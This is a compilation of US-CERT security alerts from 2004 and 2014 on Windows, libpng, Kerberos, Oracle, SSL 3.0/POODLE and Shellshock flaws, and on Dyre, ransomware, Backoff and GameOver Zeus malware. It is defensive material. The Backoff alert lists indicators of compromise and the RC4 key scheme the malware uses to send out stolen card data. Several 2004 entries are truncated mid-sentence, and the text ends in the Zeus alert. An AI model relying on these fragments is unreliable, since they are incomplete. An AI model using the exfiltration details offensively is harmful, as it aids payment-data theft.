Multiple Vulnerabilities in Microsoft Windows Components and Outlook Express
An attacker may be able to control your computer if these vulnerabilities are exploited.
Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update. Do not click on unsolicited links received in email, instant messages, web forums, or chat rooms. While this is generally a good security practice, following this behavior will not prevent the exploitation of these vulnerabilities in all cases. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Update your anti-virus software. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Specific information about the Security bulletins are available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes for these issues. This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion. Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Multiple Vulnerabilities in Microsoft Windows Components and Outlook Express
A remote, unauthenticated attacker may exploit VU#717748 to execute arbitrary code on an IIS 4.0 system.
Exploitation of VU#106324, VU#187196, VU#920060, and VU#228028, would permit a remote attacker to execute arbitrary code with the privileges of the current user. The attacker would have to convince a victim to view an HTML document (web page, HTML email) or click on a crafted URI link. Vulnerabilities described in VU#647436 and VU#868580 permit a local user to gain elevated privileges on the local system. Exploitation of VU#869640 can lead to a denial-of-service condition against Outlook Express. Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update. It is generally a good practice not to click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. However, this practice does not always prevent exploitation of these types vulnerabilities. For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts, but variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against these vulnerabilities. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Specific information about these issue are available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes. This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion. July 14, 2004: Initial release |
New Variant of MyDoom Virus
It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible.
This variant of MyDoom (known as MyDoom.M or MyDoom.O) is significant because it seems to be conducting searches on addresses it harvests from infected computers. Therefore, not only is email activity affected, response times in many popular search engines may be dramatically slower.
Author: Mindi McDowell. Feedback can be directed to US-CERT -->. Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Multiple Vulnerabilities in Systems Running Microsoft Windows
Microsoft has issued updates that resolve this problem. Obtain the appropriate update from Windows Update
Never open unexpected email attachments. Before opening an attachment, save it to a disk and scan it with anti-virus software. Make sure to turn off the option to automatically download attachments.
Email programs like Outlook and Outlook Express interpret HTML code the same way that Internet Explorer does. Attackers may be able to take advantage of that by sending malicious HTML-formatted email messages. It is important that you use anti-virus software and keep it up to date. Most anti-virus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many anti-virus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. In Microsoft Security Bulletin MS04-025, Microsoft describes a critical vulnerability in the way Internet Explorer processes .GIF and .BMP images. An attacker can use malicious images on a web page or in HTML-formatted email messages. If the attacker can convince a user to visit the web page, open the message, or otherwise view the image, the attacker may be able to gain control of the user's machine. There is also a vulnerability in the way Internet Explorer processes scripts. An attacker may be able to take advantage of frames to redirect users to a malicious web site. More technical information about this issue is available in TA04-212A and Microsoft Security Bulletin MS04-025. Author: Mindi McDowell. Feedback can be directed to the US-CERT Technical Staff. Copyright 2004 Carnegie Mellon University. Terms of use Last updated |
Critical Vulnerabilities in Microsoft Windows
Microsoft Internet Explorer contains three vulnerabilities that may Microsoft Security Bulletin MS04-025
VU#266926 - An integer overflow vulnerability has been discovered in the way that (Other resources: CAN-2004-0566)
VU#685364 - A double-free vulnerability has been discovered in the way that (Other resources: CAN-2003-1048)
VU#713878 - As previously discussed in TA-163A, (Other resources: CAN-2004-0549)
Remote attackers exploiting the vulnerabilities described above may
Apply the appropriate patch as specified by Microsoft Security
Microsoft provides several workarounds for each of these vulnerabilities. This appendix contains information provided by vendors for this
Please see Microsoft Security Bulletin MS04-025.
Feedback can be directed to the US-CERT
Jul 30, 2004: Initial release Last updated
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Multiple Vulnerabilities in libpng
Several vulnerabilities have been reported in the libpng library. Any application or system that uses this library may be affected. More detailed information is available in the individual vulnerability notes:
VU#388984 - libpng fails to properly check length of transparency chunk (tRNS) data
A buffer overflow vulnerability has been discovered in the way that libpng processes PNG images. This vulnerability could allow a remote attacker to execute arbitrary code on a vulnerable system by introducing a specially crafted PNG image. VU#236656 - libpng png_handle_iCCP() NULL pointer dereference Under some circumstances, a null pointer may be dereferenced during a memory allocation in the png_handle_iCCP() function. As a result, a PNG image with particular characteristics could cause the affected application to crash. Similar errors are reported to exist in other locations within libpng. VU#160448 - libpng integer overflow in image height processing An integer overflow error exists in the handling of PNG image height within the png_read_png() function. As a result, a PNG image with excessive height may cause an integer overflow during a memory allocation operation, which could cause the affected application to crash. VU#477512 - libpng png_handle_sPLT() integer overflow A potential integer overflow error exists during a memory allocation operation within the png_handle_sPLT() function. It is unclear what practical impact this error might have on applications using libpng. VU#817368 - libpng png_handle_sBIT() performs insufficient bounds checking A potentially insufficient bounds check exists within the png_handle_sBIT() function. A similar error exists in the png_handle_hIST() function. While the code that contains these errors could potentially permit a buffer overflow to occur during a subsequent png_crc_read() operation, it is unclear what practical vulnerabilities it might present in applications using libpng. VU#286464 - libpng contains integer overflows in progressive display image reading The libpng library provides the ability to display interlaced, or progressive display, PNG images. A number of potential integer overflow errors exist in libpng's handling of such progressive display images. While the code that contains these errors introduces dangerous conditions, it is unclear what practical vulnerabilities it might present in applications using libpng. In the case of VU#388984, an attacker with the ability to introduce a malformed PNG image to a vulnerable application could cause the application to crash or could potentially execute arbitrary code with the privileges of the user running the affected application. In the case of VU#236656 and VU#160448, an attacker with the ability to introduce a malformed PNG image to a vulnerable application could cause the application to crash. The impacts of the other vulnerabilities described above are unclear. A remote attacker could cause an application to crash or potentially execute arbitrary code by convincing a victim user to visit a malicious web site or view an email message containing a malformed image. Apply the appropriate patch or upgrade as specified by your vendor. For For individuals who rely on the original source of libpng, these issues US-CERT thanks Chris Evans for researching and reporting these vulnerabilities. Feedback can be directed to the US-CERT Technical Staff. Aug 4, 2004: Initial release |
Security Improvements in Windows XP Service Pack 2
Note: Service Pack 2 makes significant changes to improve the security of Windows XP, and these changes may have negative effects on some programs and Windows functionality. Before you install Service Pack 2, back up your important data and consult your computer manufacturer's web site for information about Service Pack 2.
Windows XP Service Pack 2 is a major operating system update that contains a number of new security updates and features. Like other Microsoft Service Packs, Windows XP Service Pack 2 also includes previously released security fixes and other operating system updates. Following is a summary of the new security updates and features in Service Pack 2:
Windows Firewall
Authors: Art Manion and Mindi McDowell. Feedback can be directed to the US-CERT Technical Staff . Copyright 2004 Carnegie Mellon University.
August 30, 2004: Initial release Last updated |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Multiple Vulnerabilities in Oracle Products
Several vulnerabilities exist in the Oracle Database Server, Application Several vulnerabilities have been reported in Oracle's Database Server, Oracle has released Oracle We are tracking them as follows:
VU#170830 - VU#316206 - VU#435974 - As more information becomes available, we will update these The impacts of the vulnerabilities described above are unclear. According to credible reports, the impacts of these vulnerabilities Apply the appropriate patch or upgrade as specified in the Oracle Organizations that use Oracle's Collaboration Suite or E-Business Suite US-CERT thanks all the parties involved in researching and reporting these Feedback can be directed to the author: Sep 1, 2004: Initial release Sep 3, 2004: Updated Credits |
Vulnerabilities in MIT Kerberos 5
VU#795632 - MIT Kerberos 5 ASN.1 decoding functions insecurely deallocate memory (double-free)
The MIT Kerberos 5 library does not securely deallocate heap memory when decoding ASN.1 structures, resulting in double-free vulnerabilities. An unauthenticated, remote attacker could execute arbitrary code on a KDC server, which could compromise an entire Kerberos realm. An attacker may also be able to execute arbitrary code on Kerberos clients, or cause a denial of service on KDCs or clients.
VU#866472 - MIT Kerberos 5 ASN.1 decoding function krb5_rd_cred() insecurely deallocates memory (double-free)
The krb5_rd_cred() function in the MIT Kerberos 5 library does not securely deallocate heap memory when decoding ASN.1 structures, resulting in a double-free vulnerability. A remote, authenticated attacker could execute arbitrary code or cause a denial of service on any system running an application that calls krb5_rd_cred(). This includes Kerberos application servers and other applications that process Kerberos authentication via the MIT Kerberos 5 library, Generic Security Services Application Programming Interface (GSSAPI), and other libraries.
VU#350792 - MIT Kerberos krb524d insecurely deallocates memory (double-free)
The MIT Kerberos krb524d daemon does not securely deallocate heap memory when handling an error condition, resulting in a double-free vulnerability. An unauthenticated, remote attacker could execute arbitrary code on a system running krb524d, which in many cases is also a KDC. The compromise of a KDC system can lead to the compromise of an entire Kerberos realm. An attacker may also be able to cause a denial of service on a system running krb524d.
VU#550464 - MIT Kerberos 5 ASN.1 decoding function asn1buf_skiptail() does not properly terminate loop
The asn1buf_skiptail() function in the MIT Kerberos 5 library does not properly terminate a loop, allowing an unauthenticated, remote attacker to cause a denial of service in a KDC, application server, or Kerberos client.
The impacts of these vulnerabilities vary, but an attacker may be able to execute arbitrary code on KDCs, systems running krb524d (typically also KDCs), application servers, applications that use Kerberos libraries directly or via GSSAPI, and Kerberos clients. An attacker could also cause a denial of service on any of these systems.
The most severe vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on a KDC system. This could result in the compromise of both the KDC and an entire Kerberos realm.
Check with your vendor(s) for patches or updates. For information about a specific vendor, please see the systems affected sections in the individual vulnerability notes or contact your vendor directly.
Alternatively, apply the appropriate source code patch(es) referenced in MITKRB5-SA-2004-002 and MITKRB5-SA-2004-003 and recompile.
These vulnerabilities will be addressed in krb5-1.3.5.
Thanks to Tom Yu and the MIT Kerberos Development team for addressing these vulnerabilities and coordinating with vendors. MIT credits the following people: Will Fiveash, Joseph Galbraith, John Hawkinson, Marc Horowitz, and Nico Williams.
September 3, 2004: Initial release Last updated
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Vulnerability in Microsoft Image Processing Component
Note: You may need to install multiple patches depending what
Never open unexpected email attachments. Before opening an attachment,
Email programs like Outlook and Outlook Express interpret HTML code
It is important that you use anti-virus software and keep it up to
Microsoft Windows Graphics Device Interface (GDI+) is used to display information on screens Author: Mindi McDowell. Feedback Copyright 2004 Carnegie Mellon University.
September 14, 2004: Initial release Last updated |
Microsoft Windows JPEG component buffer overflow
Microsoft's Graphic Device Interface Plus (GDI+) contains a Microsoft Security Bulletin MS04-028 Any applications (Microsoft or third-party) that use the GDI+ library In addition to running Microsoft's detection utility, we recommend We are tracking this vulnerability in Vulnerability Remote attackers exploiting the vulnerability described above may Apply the appropriate patches as specified in Microsoft Security In addition to releasing some patches on Windows Update, Microsoft Third-party software that relies on GDI+ to render JPEG images may Microsoft provides several workarounds for this vulnerability. The following Microsoft Products are affected: Feedback can be directed to the US-CERT
Sept 16, 2004: Initial release Last updated
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
TA14-300A: Phishing Campaign Linked with “Dyre” Banking Malware
Microsoft Windows Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payload(s).[1][2] Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware. The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors.[3] Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in unpatched versions of Adobe Reader.[4][5] After successful exploitation, a user's system will download Dyre banking malware. All of the major anti-virus vendors have successfully detected this malware prior to the release of this alert.[6] Please note, the below listing of indicators does not represent all characteristics and indicators for this campaign. Phishing Email Characteristics: System Level Indicators (upon successful exploitation): A system infected with Dyre banking malware will attempt to harvest credentials for online services, including banking services. Users and administrators are recommended to take the following preventive measures to protect their computer networks from phishing campaigns: US-CERT collects phishing email messages and website locations so that we can help people avoid becoming victims of phishing scams. You can report phishing to us by sending email to phishing-report@us-cert.gov. This product is provided subject to this Notification and this Privacy & Use policy. |
TA14-295A: Crypto Ransomware
Microsoft Windows Ransomware is a type of malicious software (malware) that infects a computer and restricts access to it until a ransom is paid to unlock it. This Alert is the result of Canadian Cyber Incident Response Centre (CCIRC) analysis in coordination with the United States Department of Homeland Security (DHS) to provide further information about crypto ransomware, specifically to: Ransomware is a type of malware that infects a computer and restricts a user’s access to the infected computer. This type of malware, which has now been observed for several years, attempts to extort money from victims by displaying an on-screen alert. These alerts often state that their computer has been locked or that all of their files have been encrypted, and demand that a ransom is paid to restore access. This ransom is typically in the range of $100–$300 dollars, and is sometimes demanded in virtual currency, such as Bitcoin. Ransomware is typically spread through phishing emails that contain malicious attachments and drive-by downloading. Drive-by downloading occurs when a user unknowingly visits an infected website and malware is downloaded and installed without their knowledge. Crypto ransomware, a variant that encrypts files, is typically spread through similar methods, and has been spread through Web-based instant messaging applications. The authors of ransomware instill fear and panic into their victims, causing them to click on a link or pay a ransom, and inevitably become infected with additional malware, including messages similar to those below: In 2012, Symantec, using data from a command and control (C2) server of 5,700 computers compromised in one day, estimated that approximately 2.9 percent of those compromised users paid the ransom. With an average ransom of $200, this meant malicious actors profited $33,600 per day, or $394,400 per month, from a single C2 server. These rough estimates demonstrate how profitable ransomware can be for malicious actors. This financial success has likely led to a proliferation of ransomware variants. In 2013, more destructive and lucrative ransomware variants were introduced including Xorist, CryptorBit, and CryptoLocker. Some variants encrypt not just the files on the infected device but also the contents of shared or networked drives. These variants are considered destructive because they encrypt user’s and organization’s files, and render them useless until criminals receive a ransom. Additional variants observed in 2014 included CryptoDefense and Cryptowall, which are also considered destructive. Reports indicate that CryptoDefense and Cryptowall share the same code, and that only the name of malware itself is different. Similar to CryptoLocker, these variants also encrypt files on the local computer, shared network files, and removable media. Systems infected with ransomware are also often infected with other malware. In the case of CryptoLocker, a user typically becomes infected by opening a malicious attachment from an email. This malicious attachment contains Upatre, a downloader, which infects the user with GameOver Zeus. GameOver Zeus is a variant of the Zeus Trojan that steals banking information and is also used to steal other types of data. Once a system is infected with GameOver Zeus, Upatre will also download CryptoLocker. Finally, CryptoLocker encrypts files on the infected system, and requests that a ransom be paid. The close ties between ransomware and other types of malware were demonstrated through the recent botnet disruption operation against GameOver Zeus, which also proved effective against CryptoLocker. In June 2014, an international law enforcement operation successfully weakened the infrastructure of both GameOver Zeus and CryptoLocker. Ransomware doesn’t only target home users; businesses can also become infected with ransomware, which can have negative consequences, including: Paying the ransom does not guarantee the encrypted files will be released; it only guarantees that the malicious actors receive the victim’s money, and in some cases, their banking information. In addition, decrypting files does not mean the malware infection itself has been removed. Infections can be devastating to an individual or organization, and recovery can be a difficult process that may require the services of a reputable data recovery specialist. US-CERT and CCIRC recommend users and administrators take the following preventive measures to protect their computer networks from ransomware infection: Individuals or organizations are not encouraged to pay the ransom, as this does not guarantee files will be released. Report instances of fraud to the FBI at the Internet Crime Complaint Center or contact the CCIRC . This product is provided subject to this Notification and this Privacy & Use policy. |
||||||||||||||||||||||||||||||||||||
|
TA14-290A: SSL 3.0 Protocol Vulnerability and POODLE Attack
All systems and applications utilizing the Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode ciphers may be vulnerable. However, the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios. US-CERT is aware of a design vulnerability found in the way SSL 3.0 handles block cipher mode padding. The POODLE attack demonstrates how an attacker can exploit this vulnerability to decrypt and extract information from inside an encrypted transaction. The SSL 3.0 vulnerability stems from the way blocks of data are encrypted under a specific type of encryption algorithm within the SSL protocol. The POODLE attack takes advantage of the protocol version negotiation feature built into SSL/TLS to force the use of SSL 3.0 and then leverages this new vulnerability to decrypt select content within the SSL session. The decryption is done byte by byte and will generate a large number of connections between the client and server. While SSL 3.0 is an old encryption standard and has generally been replaced by Transport Layer Security (TLS) (which is not vulnerable in this way), most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. Even if a client and server both support a version of TLS the SSL/TLS protocol suite allows for protocol version negotiation (being referred to as the “downgrade dance” in other reporting). The POODLE attack leverages the fact that when a secure connection attempt fails, servers will fall back to older protocols such as SSL 3.0. An attacker who can trigger a connection failure can then force the use of SSL 3.0 and attempt the new attack. [1] Two other conditions must be met to successfully execute the POODLE attack: 1) the attacker must be able to control portions of the client side of the SSL connection (varying the length of the input) and 2) the attacker must have visibility of the resulting ciphertext. The most common way to achieve these conditions would be to act as Man-in-the-Middle (MITM), requiring a whole separate form of attack to establish that level of access. These conditions make successful exploitation somewhat difficult. Environments that are already at above-average risk for MITM attacks (such as public WiFi) remove some of those challenges. The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.). There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the prerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades: [2] Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 [3] or in CERT Vulnerability Note VU#577193. [4] This product is provided subject to this Notification and this Privacy & Use policy. |
TA14-268A: GNU Bourne-Again Shell (Bash) ‘Shellshock’ Vulnerability (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE 2014-6278)
A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system [1]. The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability. GNU Bash versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment which enables network-based exploitation. [2, 3] Critical instances where the vulnerability may be exposed include: [4, 5] This vulnerability is classified by industry standards as “High” impact with CVSS Impact Subscore 10 and “Low” on complexity, which means it takes little skill to perform. This flaw allows attackers who can provide specially crafted environment variables containing arbitrary commands to execute on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and its ability to be called by an application in numerous ways. Initial solutions for Shellshock do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278. Red Hat has provided a support article [6] with updated information. Many UNIX-like operating systems, including Linux distributions and Apple Mac OS X include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743 [7]. US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summaries for CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE-2014-6278 to mitigate damage caused by the exploit. This product is provided subject to this Notification and this Privacy & Use policy. |
||||||||||||||||||||||||||||||||||||
|
TA14-212A: Backoff Point-of-Sale Malware
Point-of-Sale Systems This advisory was prepared in collaboration with the National Cybersecurity and Communications Integration Center (NCCIC), United States Secret Service (USSS), Financial Sector Information Sharing and Analysis Center (FS-ISAC), and Trustwave Spiderlabs, a trusted partner under contract with the USSS. The purpose of this release is to provide relevant and actionable technical indicators for network defense against the PoS malware dubbed "Backoff" which has been discovered exploiting businesses' administrator accounts remotely and exfiltrating consumer payment data. Over the past year, the Secret Service has responded to network intrusions at numerous businesses throughout the United States that have been impacted by the “Backoff” malware. Seven PoS system providers/vendors have confirmed that they have had multiple clients affected. Reporting continues on additional compromised locations, involving private sector entities of all sizes, and the Secret Service currently estimates that over 1,000 U.S. businesses are affected. Recent investigations revealed that malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1], Apple Remote Desktop [2], Chrome Remote Desktop [3], Splashtop 2 [4], and LogMeIn [5] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications are located, the suspects attempted to brute force the login feature of the remote desktop solution. After gaining access to what was often administrator or privileged access accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via an encrypted POST request. Organizations that believe they have been impacted should contact their local Secret Service field office and may contact the NCCIC for additional information. “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including 1.4, 1.55 (“backoff”, “goo”, “MAY”, “net”), and 1.56 (“LAST”). These variations have been seen as far back as October 2013 and continue to operate as of July 2014. In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4) which does not include keylogging functionality. Additionally, 1.55 ‘net’ removed the explorer.exe injection component: The malicious stub that is injected into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped. The malware is responsible for scraping memory from running processes on the victim machine and searching for track data. Keylogging functionality is also present in most recent variants of “Backoff”. Additionally, the malware has a C2 component that is responsible for uploading discovered data, updating the malware, downloading/executing further malware, and uninstalling the malware. Variants Based on compiled timestamps and versioning information witnessed in the C2 HTTP POST requests, “Backoff” variants were analyzed over a seven month period. The five variants witnessed in the “Backoff” malware family have notable modifications, to include: 1.55 “backoff” 1.55 “goo” 1.55 “MAY” 1.55 “net” 1.56 “LAST” Command & Control Communication All C2 communication for “Backoff” takes place via HTTP POST requests. A number of POST parameters are included when this malware makes a request to the C&C server. The ‘id’ parameter is stored in the following location, to ensure it is consistent across requests: If this key doesn’t exist, the string will be generated and stored. Data is encrypted using RC4 prior to being encoded with Base64. The password for RC4 is generated from the ‘id’ parameter, a static string of ‘jhgtsd7fjmytkr’, and the ‘ui’ parameter. These values are concatenated together and then hashed using the MD5 algorithm to form the RC4 password. In the above example, the RC4 password would be ‘56E15A1B3CB7116CAB0268AC8A2CD943 (The MD5 hash of ‘vxeyHkSjhgtsd7fjmytkrJosh @ PC123456). File Indicators: The following is a list of the Indicators of Compromise (IOCs) that should be added to the network security to search to see if these indicators are on their network. 1.4 Packed MD5: 927AE15DBF549BD60EDCDEAFB49B829E Unpacked MD5: 6A0E49C5E332DF3AF78823CA4A655AE8 Install Path: %APPDATA%\AdobeFlashPlayer\mswinsvc.exe Mutexes: uhYtntr56uisGst uyhnJmkuTgD Files Written: %APPDATA%\mskrnl %APPDATA%\winserv.exe %APPDATA%\AdobeFlashPlayer\mswinsvc.exe Static String (POST Request): zXqW9JdWLM4urgjRkX Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service User-Agent: Mozilla/4.0 URI(s): /aircanada/dark.php 1.55 “backoff” Packed MD5: F5B4786C28CCF43E569CB21A6122A97E Unpacked MD5: CA4D58C61D463F35576C58F25916F258 Install Path: %APPDATA%\AdobeFlashPlayer\mswinhost.exe Mutexes: Undsa8301nskal uyhnJmkuTgD Files Written: %APPDATA%\mskrnl %APPDATA%\winserv.exe %APPDATA%\AdobeFlashPlayer\mswinhost.exe %APPDATA%\AdobeFlashPlayer\Local.dat %APPDATA%\AdobeFlashPlayer\Log.txt Static String (POST Request): ihasd3jasdhkas Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 URI(s): /aero2/fly.php 1.55 “goo” Pa cked MD5: 17E1173F6FC7E920405F8DBDE8C9ECAC Unpacked MD5: D397D2CC9DE41FB5B5D897D1E665C549 Install Path: %APPDATA%\OracleJava\javaw.exe Mutexes: nUndsa8301nskal nuyhnJmkuTgD Files Written: %APPDATA%\nsskrnl %APPDATA%\winserv.exe %APPDATA%\OracleJava\javaw.exe %APPDATA%\OracleJava\Local.dat %APPDATA%\OracleJava\Log.txt Static String (POST Request): jhgtsd7fjmytkr Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service User-Agent: URI(s): /windows/updcheck.php 1.55 “MAY” Packed MD5: 21E61EB9F5C1E1226F9D69CBFD1BF61B Unpacked MD5: CA608E7996DED0E5009DB6CC54E08749 Install Path: %APPDATA%\OracleJava\javaw.exe Mutexes: nUndsa8301nskal nuyhnJmkuTgD Files Written: %APPDATA%\nsskrnl %APPDATA%\winserv.exe %APPDATA%\OracleJava\javaw.exe %APPDATA%\OracleJava\Local.dat %APPDATA%\OracleJava\Log.txt Static String (POST Request): jhgtsd7fjmytkr Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service User-Agent: URI(s): /windowsxp/updcheck.php 1.55 “net” Packed MD5: 0607CE9793EEA0A42819957528D92B02 Unpacked MD5: 5C1474EA275A05A2668B823D055858D9 Install Path: %APPDATA%\AdobeFlashPlayer\mswinhost.exe Mutexes: nUndsa8301nskal Files Written: %APPDATA%\AdobeFlashPlayer\mswinhost.exe %APPDATA%\AdobeFlashPlayer\Local.dat %APPDATA%\AdobeFlashPlayer\Log.txt Static String (POST Request): ihasd3jasdhkas9 Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service User-Agent: URI(s): /windowsxp/updcheck.php 1.56 “LAST” Packed MD5: 12C9C0BC18FDF98189457A9D112EEBFC Unpacked MD5: 205947B57D41145B857DE18E43EFB794 Install Path: %APPDATA%\OracleJava\javaw.exe Mutexes: nUndsa8301nskal nuyhnJmkuTgD Files Written: %APPDATA%\nsskrnl %APPDATA%\winserv.exe %APPDATA%\OracleJava\javaw.exe %APPDATA%\OracleJava\Local.dat %APPDATA%\OracleJava\Log.txt Static String (POST Request): jhgtsd7fjmytkr Registry Keys: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\identifier HKCU\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service HKLM\ SOFTWARE \Microsoft\Windows\CurrentVersion\Run\Windows NT Service HKCU\SOFTWARE\\Microsoft\Active Setup\Installed Components\{B3DB0D62-B481-4929-888B-49F426C1A136}\StubPath HKLM\SOFTWARE\\Microsoft\Active Setup\Installed Components\{B3DB0D62-B481-4929-888B-49F426C1A136}\StubPath User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 URI(s): /windebug/updcheck.php The impact of a compromised PoS system can affect both the businesses and consumer by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business’ brand and reputation, while consumers’ information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now. At the time this advisory is released, the variants of the “Backoff’ malware family are largely undetected by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It’s important to maintain up‐to‐date AV signatures and engines as new threats such as this are continually being added to your AV solution. Pending AV detection of the malware variants, network defenders can apply indicators of compromise (IOC) to a variety of prevention and detection strategies.[6],[7],[8] IOCs can be found above. The forensic investigations of compromises of retail IT/payment networks indicate that the network compromises allowed the introduction of memory scraping malware to the payment terminals. Information security professionals recommend a defense in depth approach to mitigating risk to retail payment systems. While some of the risk mitigation recommendations are general in nature, the following strategies provide an approach to minimize the possibility of an attack and mitigate the risk of data compromise: Remote Desktop Access Network Security Cash Register and PoS Security This product is provided subject to this Notification and this Privacy & Use policy. |
TA14-150A: GameOver Zeus P2P Malware
GameOver Zeus (GOZ), a peer-to-peer (P2P) variant of the Zeus family of bank credential-stealing malware identified in September 2011, [1] uses a decentralized network infrastructure of compromised personal computers and web servers to execute command-and-control. The United States Department of Homeland Security (DHS), in collaboration with the Federal Bureau of Investigation (FBI) and the Department of Justice (DOJ), is releasing this Technical Alert to provide further information about the GameOver Zeus botnet. GOZ, which is often propagated through spam and phishing messages, is primarily used by cybercriminals to harvest banking information, such as login credentials, from a victim’s computer. [2] Infected systems can also be used to engage in other malicious activities, such as sending spam or participating in distributed denial-of-service (DDoS) attacks. Prior variants of the Zeus malware utilized a centralized command and control (C2) botnet infrastructure to execute commands. Centralized C2 servers are routinely tracked and blocked by the security community. [1] GOZ, however, utilizes a P2P network of infected hosts to communicate and distribute data, and employs encryption to evade detection. These peers act as a massive proxy network that is used to propagate binary updates, distribute configuration 